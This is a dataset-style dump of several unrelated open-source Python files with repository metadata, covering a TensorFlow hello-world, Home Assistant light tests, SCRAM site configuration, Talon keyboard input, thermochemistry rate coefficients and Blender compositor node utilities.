# The op is added as a node to the default graph.
#
# The value returned by the constructor represents the output
# of the Constant op.
hello = tf.constant('Hello, TensorFlow!')
# Start tf session
sess = tf.Session()
# Run the op
print(sess.run(hello))
| 20.076923
| 62
| 0.758621
|
from __future__ import print_function
import tensorflow as tf
hello = tf.constant('Hello, TensorFlow!')
sess = tf.Session()
print(sess.run(hello))
| true
| true
|
1c40f352ff0180872c40eee0f3b7b37879d3f85f
| 6,712
|
py
|
Python
|
tests/components/light/test_reproduce_state.py
|
olbjan/home-assistant-1
|
1adb45f74e96fc5eff137a3727647a7e428e123c
|
[
"Apache-2.0"
] | 7
|
2019-02-07T14:14:12.000Z
|
2019-07-28T06:56:10.000Z
|
tests/components/light/test_reproduce_state.py
|
tomachristian/core
|
71c8fcee20c55536b33c3ee774c76c1795f37cd2
|
[
"Apache-2.0"
] | 6
|
2021-02-08T20:54:31.000Z
|
2022-03-12T00:50:43.000Z
|
tests/components/light/test_reproduce_state.py
|
tomachristian/core
|
71c8fcee20c55536b33c3ee774c76c1795f37cd2
|
[
"Apache-2.0"
] | 2
|
2020-04-19T13:35:24.000Z
|
2020-04-19T13:35:51.000Z
|
"""Test reproduce state for Light."""
from homeassistant.components.light.reproduce_state import DEPRECATION_WARNING
from homeassistant.core import State
from tests.common import async_mock_service
VALID_BRIGHTNESS = {"brightness": 180}
VALID_WHITE_VALUE = {"white_value": 200}
VALID_FLASH = {"flash": "short"}
VALID_EFFECT = {"effect": "random"}
VALID_TRANSITION = {"transition": 15}
VALID_COLOR_NAME = {"color_name": "red"}
VALID_COLOR_TEMP = {"color_temp": 240}
VALID_HS_COLOR = {"hs_color": (345, 75)}
VALID_KELVIN = {"kelvin": 4000}
VALID_PROFILE = {"profile": "relax"}
VALID_RGB_COLOR = {"rgb_color": (255, 63, 111)}
VALID_XY_COLOR = {"xy_color": (0.59, 0.274)}
async def test_reproducing_states(hass, caplog):
"""Test reproducing Light states."""
hass.states.async_set("light.entity_off", "off", {})
hass.states.async_set("light.entity_bright", "on", VALID_BRIGHTNESS)
hass.states.async_set("light.entity_white", "on", VALID_WHITE_VALUE)
hass.states.async_set("light.entity_flash", "on", VALID_FLASH)
hass.states.async_set("light.entity_effect", "on", VALID_EFFECT)
hass.states.async_set("light.entity_trans", "on", VALID_TRANSITION)
hass.states.async_set("light.entity_name", "on", VALID_COLOR_NAME)
hass.states.async_set("light.entity_temp", "on", VALID_COLOR_TEMP)
hass.states.async_set("light.entity_hs", "on", VALID_HS_COLOR)
hass.states.async_set("light.entity_kelvin", "on", VALID_KELVIN)
hass.states.async_set("light.entity_profile", "on", VALID_PROFILE)
hass.states.async_set("light.entity_rgb", "on", VALID_RGB_COLOR)
hass.states.async_set("light.entity_xy", "on", VALID_XY_COLOR)
turn_on_calls = async_mock_service(hass, "light", "turn_on")
turn_off_calls = async_mock_service(hass, "light", "turn_off")
# These calls should do nothing as entities already in desired state
await hass.helpers.state.async_reproduce_state(
[
State("light.entity_off", "off"),
State("light.entity_bright", "on", VALID_BRIGHTNESS),
State("light.entity_white", "on", VALID_WHITE_VALUE),
State("light.entity_flash", "on", VALID_FLASH),
State("light.entity_effect", "on", VALID_EFFECT),
State("light.entity_trans", "on", VALID_TRANSITION),
State("light.entity_name", "on", VALID_COLOR_NAME),
State("light.entity_temp", "on", VALID_COLOR_TEMP),
State("light.entity_hs", "on", VALID_HS_COLOR),
State("light.entity_kelvin", "on", VALID_KELVIN),
State("light.entity_profile", "on", VALID_PROFILE),
State("light.entity_rgb", "on", VALID_RGB_COLOR),
State("light.entity_xy", "on", VALID_XY_COLOR),
],
blocking=True,
)
assert len(turn_on_calls) == 0
assert len(turn_off_calls) == 0
# Test invalid state is handled
await hass.helpers.state.async_reproduce_state(
[State("light.entity_off", "not_supported")], blocking=True
)
assert "not_supported" in caplog.text
assert len(turn_on_calls) == 0
assert len(turn_off_calls) == 0
# Make sure correct services are called
await hass.helpers.state.async_reproduce_state(
[
State("light.entity_xy", "off"),
State("light.entity_off", "on", VALID_BRIGHTNESS),
State("light.entity_bright", "on", VALID_WHITE_VALUE),
State("light.entity_white", "on", VALID_FLASH),
State("light.entity_flash", "on", VALID_EFFECT),
State("light.entity_effect", "on", VALID_TRANSITION),
State("light.entity_trans", "on", VALID_COLOR_NAME),
State("light.entity_name", "on", VALID_COLOR_TEMP),
State("light.entity_temp", "on", VALID_HS_COLOR),
State("light.entity_hs", "on", VALID_KELVIN),
State("light.entity_kelvin", "on", VALID_PROFILE),
State("light.entity_profile", "on", VALID_RGB_COLOR),
State("light.entity_rgb", "on", VALID_XY_COLOR),
],
blocking=True,
)
assert len(turn_on_calls) == 12
expected_calls = []
expected_off = VALID_BRIGHTNESS
expected_off["entity_id"] = "light.entity_off"
expected_calls.append(expected_off)
expected_bright = VALID_WHITE_VALUE
expected_bright["entity_id"] = "light.entity_bright"
expected_calls.append(expected_bright)
expected_white = VALID_FLASH
expected_white["entity_id"] = "light.entity_white"
expected_calls.append(expected_white)
expected_flash = VALID_EFFECT
expected_flash["entity_id"] = "light.entity_flash"
expected_calls.append(expected_flash)
expected_effect = VALID_TRANSITION
expected_effect["entity_id"] = "light.entity_effect"
expected_calls.append(expected_effect)
expected_trans = VALID_COLOR_NAME
expected_trans["entity_id"] = "light.entity_trans"
expected_calls.append(expected_trans)
expected_name = VALID_COLOR_TEMP
expected_name["entity_id"] = "light.entity_name"
expected_calls.append(expected_name)
expected_temp = VALID_HS_COLOR
expected_temp["entity_id"] = "light.entity_temp"
expected_calls.append(expected_temp)
expected_hs = VALID_KELVIN
expected_hs["entity_id"] = "light.entity_hs"
expected_calls.append(expected_hs)
expected_kelvin = VALID_PROFILE
expected_kelvin["entity_id"] = "light.entity_kelvin"
expected_calls.append(expected_kelvin)
expected_profile = VALID_RGB_COLOR
expected_profile["entity_id"] = "light.entity_profile"
expected_calls.append(expected_profile)
expected_rgb = VALID_XY_COLOR
expected_rgb["entity_id"] = "light.entity_rgb"
expected_calls.append(expected_rgb)
for call in turn_on_calls:
assert call.domain == "light"
found = False
for expected in expected_calls:
if call.data["entity_id"] == expected["entity_id"]:
# We found the matching entry
assert call.data == expected
found = True
break
# No entry found
assert found
assert len(turn_off_calls) == 1
assert turn_off_calls[0].domain == "light"
assert turn_off_calls[0].data == {"entity_id": "light.entity_xy"}
async def test_deprecation_warning(hass, caplog):
"""Test deprecation warning."""
hass.states.async_set("light.entity_off", "off", {})
turn_on_calls = async_mock_service(hass, "light", "turn_on")
await hass.helpers.state.async_reproduce_state(
[State("light.entity_off", "on", {"brightness_pct": 80})], blocking=True
)
assert len(turn_on_calls) == 1
assert DEPRECATION_WARNING % ["brightness_pct"] in caplog.text
| 39.482353
| 80
| 0.681317
|
from homeassistant.components.light.reproduce_state import DEPRECATION_WARNING
from homeassistant.core import State
from tests.common import async_mock_service
VALID_BRIGHTNESS = {"brightness": 180}
VALID_WHITE_VALUE = {"white_value": 200}
VALID_FLASH = {"flash": "short"}
VALID_EFFECT = {"effect": "random"}
VALID_TRANSITION = {"transition": 15}
VALID_COLOR_NAME = {"color_name": "red"}
VALID_COLOR_TEMP = {"color_temp": 240}
VALID_HS_COLOR = {"hs_color": (345, 75)}
VALID_KELVIN = {"kelvin": 4000}
VALID_PROFILE = {"profile": "relax"}
VALID_RGB_COLOR = {"rgb_color": (255, 63, 111)}
VALID_XY_COLOR = {"xy_color": (0.59, 0.274)}
async def test_reproducing_states(hass, caplog):
hass.states.async_set("light.entity_off", "off", {})
hass.states.async_set("light.entity_bright", "on", VALID_BRIGHTNESS)
hass.states.async_set("light.entity_white", "on", VALID_WHITE_VALUE)
hass.states.async_set("light.entity_flash", "on", VALID_FLASH)
hass.states.async_set("light.entity_effect", "on", VALID_EFFECT)
hass.states.async_set("light.entity_trans", "on", VALID_TRANSITION)
hass.states.async_set("light.entity_name", "on", VALID_COLOR_NAME)
hass.states.async_set("light.entity_temp", "on", VALID_COLOR_TEMP)
hass.states.async_set("light.entity_hs", "on", VALID_HS_COLOR)
hass.states.async_set("light.entity_kelvin", "on", VALID_KELVIN)
hass.states.async_set("light.entity_profile", "on", VALID_PROFILE)
hass.states.async_set("light.entity_rgb", "on", VALID_RGB_COLOR)
hass.states.async_set("light.entity_xy", "on", VALID_XY_COLOR)
turn_on_calls = async_mock_service(hass, "light", "turn_on")
turn_off_calls = async_mock_service(hass, "light", "turn_off")
await hass.helpers.state.async_reproduce_state(
[
State("light.entity_off", "off"),
State("light.entity_bright", "on", VALID_BRIGHTNESS),
State("light.entity_white", "on", VALID_WHITE_VALUE),
State("light.entity_flash", "on", VALID_FLASH),
State("light.entity_effect", "on", VALID_EFFECT),
State("light.entity_trans", "on", VALID_TRANSITION),
State("light.entity_name", "on", VALID_COLOR_NAME),
State("light.entity_temp", "on", VALID_COLOR_TEMP),
State("light.entity_hs", "on", VALID_HS_COLOR),
State("light.entity_kelvin", "on", VALID_KELVIN),
State("light.entity_profile", "on", VALID_PROFILE),
State("light.entity_rgb", "on", VALID_RGB_COLOR),
State("light.entity_xy", "on", VALID_XY_COLOR),
],
blocking=True,
)
assert len(turn_on_calls) == 0
assert len(turn_off_calls) == 0
await hass.helpers.state.async_reproduce_state(
[State("light.entity_off", "not_supported")], blocking=True
)
assert "not_supported" in caplog.text
assert len(turn_on_calls) == 0
assert len(turn_off_calls) == 0
await hass.helpers.state.async_reproduce_state(
[
State("light.entity_xy", "off"),
State("light.entity_off", "on", VALID_BRIGHTNESS),
State("light.entity_bright", "on", VALID_WHITE_VALUE),
State("light.entity_white", "on", VALID_FLASH),
State("light.entity_flash", "on", VALID_EFFECT),
State("light.entity_effect", "on", VALID_TRANSITION),
State("light.entity_trans", "on", VALID_COLOR_NAME),
State("light.entity_name", "on", VALID_COLOR_TEMP),
State("light.entity_temp", "on", VALID_HS_COLOR),
State("light.entity_hs", "on", VALID_KELVIN),
State("light.entity_kelvin", "on", VALID_PROFILE),
State("light.entity_profile", "on", VALID_RGB_COLOR),
State("light.entity_rgb", "on", VALID_XY_COLOR),
],
blocking=True,
)
assert len(turn_on_calls) == 12
expected_calls = []
expected_off = VALID_BRIGHTNESS
expected_off["entity_id"] = "light.entity_off"
expected_calls.append(expected_off)
expected_bright = VALID_WHITE_VALUE
expected_bright["entity_id"] = "light.entity_bright"
expected_calls.append(expected_bright)
expected_white = VALID_FLASH
expected_white["entity_id"] = "light.entity_white"
expected_calls.append(expected_white)
expected_flash = VALID_EFFECT
expected_flash["entity_id"] = "light.entity_flash"
expected_calls.append(expected_flash)
expected_effect = VALID_TRANSITION
expected_effect["entity_id"] = "light.entity_effect"
expected_calls.append(expected_effect)
expected_trans = VALID_COLOR_NAME
expected_trans["entity_id"] = "light.entity_trans"
expected_calls.append(expected_trans)
expected_name = VALID_COLOR_TEMP
expected_name["entity_id"] = "light.entity_name"
expected_calls.append(expected_name)
expected_temp = VALID_HS_COLOR
expected_temp["entity_id"] = "light.entity_temp"
expected_calls.append(expected_temp)
expected_hs = VALID_KELVIN
expected_hs["entity_id"] = "light.entity_hs"
expected_calls.append(expected_hs)
expected_kelvin = VALID_PROFILE
expected_kelvin["entity_id"] = "light.entity_kelvin"
expected_calls.append(expected_kelvin)
expected_profile = VALID_RGB_COLOR
expected_profile["entity_id"] = "light.entity_profile"
expected_calls.append(expected_profile)
expected_rgb = VALID_XY_COLOR
expected_rgb["entity_id"] = "light.entity_rgb"
expected_calls.append(expected_rgb)
for call in turn_on_calls:
assert call.domain == "light"
found = False
for expected in expected_calls:
if call.data["entity_id"] == expected["entity_id"]:
assert call.data == expected
found = True
break
assert found
assert len(turn_off_calls) == 1
assert turn_off_calls[0].domain == "light"
assert turn_off_calls[0].data == {"entity_id": "light.entity_xy"}
async def test_deprecation_warning(hass, caplog):
hass.states.async_set("light.entity_off", "off", {})
turn_on_calls = async_mock_service(hass, "light", "turn_on")
await hass.helpers.state.async_reproduce_state(
[State("light.entity_off", "on", {"brightness_pct": 80})], blocking=True
)
assert len(turn_on_calls) == 1
assert DEPRECATION_WARNING % ["brightness_pct"] in caplog.text
| true
| true
|
1c40f405c2c15916fe6045fd7c3a17301d922752
| 3,574
|
py
|
Python
|
SCRAM/Core/SiteConfig.py
|
gudrutis/pySCRAM
|
662aa639caa52d0ccc931f0ed41f245ad37c9765
|
[
"MIT"
] | 5
|
2015-09-15T15:07:43.000Z
|
2021-11-15T08:07:47.000Z
|
SCRAM/Core/SiteConfig.py
|
gudrutis/pySCRAM
|
662aa639caa52d0ccc931f0ed41f245ad37c9765
|
[
"MIT"
] | 24
|
2015-01-07T08:16:28.000Z
|
2022-03-26T08:20:27.000Z
|
SCRAM/Core/SiteConfig.py
|
gudrutis/pySCRAM
|
662aa639caa52d0ccc931f0ed41f245ad37c9765
|
[
"MIT"
] | 2
|
2018-10-08T11:31:44.000Z
|
2021-11-15T08:01:12.000Z
|
from sys import stderr
from os.path import join, exists
from re import match
from os import environ
class SiteConfig(object):
def __init__(self):
self.siteconf = 'etc/scramrc/site.cfg'
self.site = {'release-checks': {}, 'release-checks-timeout': {}}
self.site['release-checks']['value'] = "1"
self.site['release-checks']['valid_values'] = '0|1|yes|no'
self.site['release-checks']['help'] = "Enable/disable release checks e.g. " \
"production architectures, deprecated releases. This avoids " \
"accessing releases information from internet."
self.site['release-checks-timeout']['value'] = "10"
self.site['release-checks-timeout']['valid_values'] = '[3-9]|[1-9][0-9]+'
self.site['release-checks-timeout']['help'] = "Time in seconds after which " \
"a request to get release information should be timed out " \
"(min. value 3s)."
self.readSiteConfig()
return
def readSiteConfig(self):
conf = join(environ['SCRAM_LOOKUPDB'], self.siteconf)
if not exists(conf):
return
with open(conf, 'r') as ref:
for line in [l.strip('\n').strip() for l in ref.readlines() if '=' in l]:
if line.startswith('#'):
continue
data = [x.strip() for x in line.split('=', 1)]
if not data[0] in self.site:
self.site[data[0]] = {}
self.site[data[0]]['value'] = data[1]
return
def dump(self, key=""):
data = []
if key and (key in self.site) and ('valid_values' in self.site[key]):
data.append(key)
else:
data = sorted(list(self.site))
print("Following SCRAM site configuration parameters are available:")
for key in data:
if 'valid_values' in self.site[key]:
print(" Name : %s" % key)
print(" Value : %s" % self.site[key]['value'])
print(" Valid values: %s" % self.site[key]['valid_values'])
print(" Purpose : %s\n" % self.site[key]['help'])
return True
def get(self, key):
if (key not in self.site) or ('valid_values' not in self.site[key]):
print("ERROR: Unknown site configuration parameter '%s'. "
"Known parameters are" % key, file=stderr)
for key in self.site:
if 'valid_values' not in self.site[key]:
continue
print(" * %s" % key, file=stderr)
return None
return self.site[key]['value']
def set(self, key, value):
cvalue = self.get(key)
if cvalue is None:
return False
valid_value = self.site[key]['valid_values']
if not match('^%s$' % valid_value, value):
print("ERROR: Invalid value '%s' provided. Valid value for %s "
"should match '%s'" % (value, key, valid_value), file=stderr)
return False
print('%s=%s' % (key, value))
if cvalue == value:
return True
self.site[key]['value'] = value
conf = join(environ['SCRAM_LOOKUPDB'], self.siteconf)
with open(conf, 'w') as ref:
for key in self.site:
ref.write('%s=%s\n' % (key, self.site[key]['value']))
return True
| 43.585366
| 115
| 0.510912
|
from sys import stderr
from os.path import join, exists
from re import match
from os import environ
class SiteConfig(object):
def __init__(self):
self.siteconf = 'etc/scramrc/site.cfg'
self.site = {'release-checks': {}, 'release-checks-timeout': {}}
self.site['release-checks']['value'] = "1"
self.site['release-checks']['valid_values'] = '0|1|yes|no'
self.site['release-checks']['help'] = "Enable/disable release checks e.g. " \
"production architectures, deprecated releases. This avoids " \
"accessing releases information from internet."
self.site['release-checks-timeout']['value'] = "10"
self.site['release-checks-timeout']['valid_values'] = '[3-9]|[1-9][0-9]+'
self.site['release-checks-timeout']['help'] = "Time in seconds after which " \
"a request to get release information should be timed out " \
"(min. value 3s)."
self.readSiteConfig()
return
def readSiteConfig(self):
conf = join(environ['SCRAM_LOOKUPDB'], self.siteconf)
if not exists(conf):
return
with open(conf, 'r') as ref:
for line in [l.strip('\n').strip() for l in ref.readlines() if '=' in l]:
if line.startswith('#'):
continue
data = [x.strip() for x in line.split('=', 1)]
if not data[0] in self.site:
self.site[data[0]] = {}
self.site[data[0]]['value'] = data[1]
return
def dump(self, key=""):
data = []
if key and (key in self.site) and ('valid_values' in self.site[key]):
data.append(key)
else:
data = sorted(list(self.site))
print("Following SCRAM site configuration parameters are available:")
for key in data:
if 'valid_values' in self.site[key]:
print(" Name : %s" % key)
print(" Value : %s" % self.site[key]['value'])
print(" Valid values: %s" % self.site[key]['valid_values'])
print(" Purpose : %s\n" % self.site[key]['help'])
return True
def get(self, key):
if (key not in self.site) or ('valid_values' not in self.site[key]):
print("ERROR: Unknown site configuration parameter '%s'. "
"Known parameters are" % key, file=stderr)
for key in self.site:
if 'valid_values' not in self.site[key]:
continue
print(" * %s" % key, file=stderr)
return None
return self.site[key]['value']
def set(self, key, value):
cvalue = self.get(key)
if cvalue is None:
return False
valid_value = self.site[key]['valid_values']
if not match('^%s$' % valid_value, value):
print("ERROR: Invalid value '%s' provided. Valid value for %s "
"should match '%s'" % (value, key, valid_value), file=stderr)
return False
print('%s=%s' % (key, value))
if cvalue == value:
return True
self.site[key]['value'] = value
conf = join(environ['SCRAM_LOOKUPDB'], self.siteconf)
with open(conf, 'w') as ref:
for key in self.site:
ref.write('%s=%s\n' % (key, self.site[key]['value']))
return True
| true
| true
|
1c40f4310d253031dc57ddc58e471fbf7ff1469b
| 857
|
py
|
Python
|
games/utils/switch_input.py
|
ja-mesmugford/talon_config
|
d30e02f30873986b899bd1f10efc7442c6bd6d22
|
[
"MIT"
] | 1
|
2022-02-04T06:19:23.000Z
|
2022-02-04T06:19:23.000Z
|
games/utils/switch_input.py
|
ja-mesmugford/talon_config
|
d30e02f30873986b899bd1f10efc7442c6bd6d22
|
[
"MIT"
] | null | null | null |
games/utils/switch_input.py
|
ja-mesmugford/talon_config
|
d30e02f30873986b899bd1f10efc7442c6bd6d22
|
[
"MIT"
] | null | null | null |
"""This module is a stopgap to improve game compatibility.
Replaces Talon's native input within certain contexts.
"""
import time
def switch_to_keyboard_module(context):
"""Switch to using the PyPI `keyboard` module for input in this context.
Some games aren't registering Talon's input as of Windows beta 988 (for
example, Europa Universalis IV). However, the PyPi `keyboard` module seems
to work ok.
"""
import keyboard
@context.action_class("main")
class MainActions:
def key(key: str):
# Naive method - this may not cover all keys.
for individual_press in key.split(" "):
keys = individual_press.split("-")
keyboard.press_and_release("+".join(keys))
# TODO: Integrate key settings, switch this delay
time.sleep(0.02)
| 29.551724
| 78
| 0.644107
|
import time
def switch_to_keyboard_module(context):
import keyboard
@context.action_class("main")
class MainActions:
def key(key: str):
for individual_press in key.split(" "):
keys = individual_press.split("-")
keyboard.press_and_release("+".join(keys))
time.sleep(0.02)
| true
| true
|
1c40f4f29e2db0b4751f30f3a623537319be4258
| 3,312
|
py
|
Python
|
project/code/thermo.py
|
HeyItsRiddhi/cs207_riddhi_shah
|
18d7d6f1fcad213ce35a93ee33c03620f8b06b65
|
[
"MIT"
] | null | null | null |
project/code/thermo.py
|
HeyItsRiddhi/cs207_riddhi_shah
|
18d7d6f1fcad213ce35a93ee33c03620f8b06b65
|
[
"MIT"
] | null | null | null |
project/code/thermo.py
|
HeyItsRiddhi/cs207_riddhi_shah
|
18d7d6f1fcad213ce35a93ee33c03620f8b06b65
|
[
"MIT"
] | null | null | null |
"""Thermodynamics and Thermochemistry for Chemical Kinetics
This module contains a thermochem class with methods for
computing the backward reaction rates for a set of
reversible, elementary reactions.
"""
import numpy as np
class thermochem:
"""Methods for calculating the backward reaction rate.
Cp_over_R: Returns specific heat of each specie given by
the NASA polynomials.
H_over_RT: Returns the enthalpy of each specie given by
the NASA polynomials.
S_over_R: Returns the entropy of each specie given by
the NASA polynomials.
backward_coeffs: Returns the backward reaction rate
coefficient for reach reaction.
Please see the notes in each routine for clarifications and
warnings. You will need to customize these methods (and
likely the entire class) to suit your own code base.
Nevertheless, it is hoped that you will find these methods
to be of some use.
"""
def __init__(self, rxnset):
self.rxnset = rxnset
self.p0 = 1.0e+05 # Pa
self.R = 8.3144598 # J / mol / K
self.gamma = np.sum(self.rxnset.nuij, axis=0)
def Cp_over_R(self, T):
# WARNING: This line will depend on your own data structures!
# Be careful to get the correct coefficients for the appropriate
# temperature range. That is, for T <= Tmid get the low temperature
# range coeffs and for T > Tmid get the high temperature range coeffs.
a = self.rxnset.nasa7_coeffs
Cp_R = (a[:,0] + a[:,1] * T + a[:,2] * T**2.0
+ a[:,3] * T**3.0 + a[:,4] * T**4.0)
return Cp_R
def H_over_RT(self, T):
# WARNING: This line will depend on your own data structures!
# Be careful to get the correct coefficients for the appropriate
# temperature range. That is, for T <= Tmid get the low temperature
# range coeffs and for T > Tmid get the high temperature range coeffs.
a = self.rxnset.nasa7_coeffs
H_RT = (a[:,0] + a[:,1] * T / 2.0 + a[:,2] * T**2.0 / 3.0
+ a[:,3] * T**3.0 / 4.0 + a[:,4] * T**4.0 / 5.0
+ a[:,5] / T)
return H_RT
def S_over_R(self, T):
# WARNING: This line will depend on your own data structures!
# Be careful to get the correct coefficients for the appropriate
# temperature range. That is, for T <= Tmid get the low temperature
# range coeffs and for T > Tmid get the high temperature range coeffs.
a = self.rxnset.nasa7_coeffs
S_R = (a[:,0] * np.log(T) + a[:,1] * T + a[:,2] * T**2.0 / 2.0
+ a[:,3] * T**3.0 / 3.0 + a[:,4] * T**4.0 / 4.0 + a[:,6])
return S_R
def backward_coeffs(self, kf, T):
# Change in enthalpy and entropy for each reaction
delta_H_over_RT = np.dot(self.rxnset.nuij.T, self.H_over_RT(T))
delta_S_over_R = np.dot(self.rxnset.nuij.T, self.S_over_R(T))
# Negative of change in Gibbs free energy for each reaction
delta_G_over_RT = delta_S_over_R - delta_H_over_RT
# Prefactor in Ke
fact = self.p0 / self.R / T
# Ke
kb = fact**self.gamma * np.exp(delta_G_over_RT)
return kf / kb
| 36.395604
| 78
| 0.602053
|
import numpy as np
class thermochem:
def __init__(self, rxnset):
self.rxnset = rxnset
self.p0 = 1.0e+05
self.R = 8.3144598
self.gamma = np.sum(self.rxnset.nuij, axis=0)
def Cp_over_R(self, T):
a = self.rxnset.nasa7_coeffs
Cp_R = (a[:,0] + a[:,1] * T + a[:,2] * T**2.0
+ a[:,3] * T**3.0 + a[:,4] * T**4.0)
return Cp_R
def H_over_RT(self, T):
a = self.rxnset.nasa7_coeffs
H_RT = (a[:,0] + a[:,1] * T / 2.0 + a[:,2] * T**2.0 / 3.0
+ a[:,3] * T**3.0 / 4.0 + a[:,4] * T**4.0 / 5.0
+ a[:,5] / T)
return H_RT
def S_over_R(self, T):
a = self.rxnset.nasa7_coeffs
S_R = (a[:,0] * np.log(T) + a[:,1] * T + a[:,2] * T**2.0 / 2.0
+ a[:,3] * T**3.0 / 3.0 + a[:,4] * T**4.0 / 4.0 + a[:,6])
return S_R
def backward_coeffs(self, kf, T):
delta_H_over_RT = np.dot(self.rxnset.nuij.T, self.H_over_RT(T))
delta_S_over_R = np.dot(self.rxnset.nuij.T, self.S_over_R(T))
delta_G_over_RT = delta_S_over_R - delta_H_over_RT
fact = self.p0 / self.R / T
kb = fact**self.gamma * np.exp(delta_G_over_RT)
return kf / kb
| true
| true
|
1c40f60cd66cb57d752b99ae0302f7849ac74e37
| 579
|
py
|
Python
|
package/cloudshell/cp/azure/common/parsers/command_result_parser.py
|
tim-spiglanin/Azure-Shell
|
58c52994f0d6cfd798c5dca33737419ec18363d4
|
[
"Apache-2.0"
] | 5
|
2016-09-08T08:33:47.000Z
|
2020-02-10T12:31:15.000Z
|
package/cloudshell/cp/aws/domain/services/parsers/command_results_parser.py
|
QualiSystemsLab/AWS-Shell-ext
|
bf7b62640d8d97a5e9199edb7a1ada0b98aac6fb
|
[
"0BSD"
] | 505
|
2016-08-09T07:41:03.000Z
|
2021-02-08T20:26:46.000Z
|
package/cloudshell/cp/aws/domain/services/parsers/command_results_parser.py
|
QualiSystemsLab/AWS-Shell-ext
|
bf7b62640d8d97a5e9199edb7a1ada0b98aac6fb
|
[
"0BSD"
] | 9
|
2016-06-20T11:41:54.000Z
|
2020-11-21T00:42:45.000Z
|
import jsonpickle
class CommandResultsParser(object):
def set_command_result(self, result, unpicklable=False):
"""
Serializes output as JSON and writes it to console output wrapped with special prefix and suffix
:param result: Result to return
:param unpicklable: If True adds JSON can be deserialized as real object.
When False will be deserialized as dictionary
"""
json = jsonpickle.encode(result, unpicklable=unpicklable)
result_for_output = str(json)
return result_for_output
| 38.6
| 104
| 0.678756
|
import jsonpickle
class CommandResultsParser(object):
def set_command_result(self, result, unpicklable=False):
json = jsonpickle.encode(result, unpicklable=unpicklable)
result_for_output = str(json)
return result_for_output
| true
| true
|
1c40f9e39c4c934d336e12ba96942af24833e077
| 20,369
|
py
|
Python
|
Node_Utility.py
|
SBCV/PythonBlenderUtility
|
4f91c5a356fede103bcb8c2a9ba1d4d0b01aadc3
|
[
"MIT"
] | 1
|
2022-01-30T05:58:06.000Z
|
2022-01-30T05:58:06.000Z
|
Node_Utility.py
|
SBCV/PythonBlenderUtility
|
4f91c5a356fede103bcb8c2a9ba1d4d0b01aadc3
|
[
"MIT"
] | null | null | null |
Node_Utility.py
|
SBCV/PythonBlenderUtility
|
4f91c5a356fede103bcb8c2a9ba1d4d0b01aadc3
|
[
"MIT"
] | null | null | null |
import bpy
import os
from collections import defaultdict
from Utility.Logging_Extension import logger
# http://blender.stackexchange.com/questions/8936/does-switching-from-blender-render-to-cycles-mess-things-up
# * All matierals in cycles use nodes (even if you set up the material in the Properties panel, it will create
# nodes in the node editor).
# * Since BI materials don't use nodes by default, when you switch to cycles from BI there won't be any BI
# nodes in the node tree, yet nodes will be enabled. This will make the material render as transparent.
# One must switch / toggle between use_shader nodes
# Remark:
# info pannel in cycles:
# the info pannel in cycles misses a lot of different commands
# http://blender.stackexchange.com/questions/18020/print-all-commands-in-the-info-view
# https://www.blender.org/api/blender_python_api_2_72_release/info_api_reference.html#operators
# Most key-strokes and buttons in Blender call an operator which is also exposed to python via bpy.ops,
# To see the Python equivalent hover your mouse over the button and see the tool-tip,
# eg Python: bpy.ops.render.render(), If there is no tool-tip or the Python: line is missing then this button
# is not using an operator and can't be accessed from Python.
# If you want to use this in a script you can press Control-C while your mouse is over the button to copy it to the
# clipboard.
# =================
# alternative approach (not tested yet)
# http://blender.stackexchange.com/questions/364/how-do-i-convert-materials-from-blender-internal-to-cycles
# https://blenderartists.org/forum/showthread.php?247271-Cycles-Automatic-Material-Textures-Node
def rearrange_nodes():
logger.info('rearrange_nodes: ...')
# TODO
# https://www.blendernation.com/2015/11/03/development-cleaning-up-node-trees/
# https://github.com/JuhaW/NodeArrange/blob/master/__init__.py
assert False
def create_viewer_node(scene, preceeding_node_name, preceeding_channel_name):
"""
For debug purposes. Allows to visualize intermediate nodes.
:param scene:
:param preceeding_node_name:
:param preceeding_channel_name:
:return:
"""
logger.info('create_viewer_node: ...')
scene_nodes = scene.node_tree.nodes
scene_links = scene.node_tree.links
mask_id_node = scene_nodes.get(preceeding_node_name)
viewer_node = scene_nodes.new('CompositorNodeViewer')
scene_links.new(mask_id_node.outputs[preceeding_channel_name],
viewer_node.inputs['Image'])
logger.info('create_viewer_node: Done')
def create_depth_viewer_node(scene):
"""
This will save the z buffer in the Viewer Node after rendering
bpy.ops.render.render()
rendered_image = bpy.data.images['Viewer Node']
pixels = rendered_image.pixels
:param scene:
:return:
"""
logger.info('create_depth_output_nodes: ...')
scene.use_nodes = True
scene_nodes = scene.node_tree.nodes
scene_links = scene.node_tree.links
default_render_layers_node = scene_nodes.get('Render Layers')
# output_value = default_render_layers_node.outputs[output_type]
# print(type(output_value))
viewer_node = scene_nodes.get('Depth Viewer')
if viewer_node is None:
viewer_node = scene_nodes.new('CompositorNodeViewer')
viewer_node.name = 'Depth Viewer'
logger.vinfo('viewer_node.name', viewer_node.name)
viewer_node.use_alpha = False
output_type = 'Depth'
scene_links.new(
default_render_layers_node.outputs[output_type],
viewer_node.inputs[0]) # link Z to output
logger.info('create_depth_output_nodes: Done')
def create_additional_optical_flow_output_nodes(scene,
output_path=None,
image_stem=None,
leading_zeroes_template='#####'):
logger.info('create_additional_optical_flow_output_nodes: ...')
default_render_layer = scene.render.layers.get(scene.render.layers.active.name)
default_render_layer.use_pass_vector = True
default_render_layer.pass_alpha_threshold = 0
scene.use_nodes = True
scene_links = scene.node_tree.links
scene_nodes = scene.node_tree.nodes
default_render_layers_node = scene_nodes.get('Render Layers')
optical_flow_output_node = scene_nodes.new('CompositorNodeOutputFile')
optical_flow_output_node.format.file_format = 'OPEN_EXR'
#optical_flow_output_node.format.use_zbuffer = True # Store floats
if output_path is not None:
optical_flow_output_node.base_path = output_path
if image_stem is not None:
optical_flow_output_node.file_slots[0].path = image_stem + leading_zeroes_template
scene_links.new(default_render_layers_node.outputs['Vector'],
optical_flow_output_node.inputs['Image'])
logger.info('create_additional_optical_flow_output_nodes: Done')
return optical_flow_output_node
def create_additional_depth_output_nodes(scene,
output_path=None,
image_stem=None,
leading_zeroes_template='#####'):
logger.info('create_additional_depth_output_nodes: ...')
default_render_layer = scene.render.layers.get(scene.render.layers.active.name)
default_render_layer.pass_alpha_threshold = 0
scene.use_nodes = True
scene_nodes = scene.node_tree.nodes
scene_links = scene.node_tree.links
default_render_layers_node = scene_nodes.get('Render Layers')
depth_image_output_node = scene_nodes.new('CompositorNodeOutputFile')
depth_image_output_node.format.file_format = 'OPEN_EXR'
depth_image_output_node.format.use_zbuffer = True # Store floats
if output_path is not None:
depth_image_output_node.base_path = output_path
if image_stem is not None:
depth_image_output_node.file_slots[0].path = image_stem + leading_zeroes_template
scene_links.new(default_render_layers_node.outputs['Depth'],
depth_image_output_node.inputs['Image'])
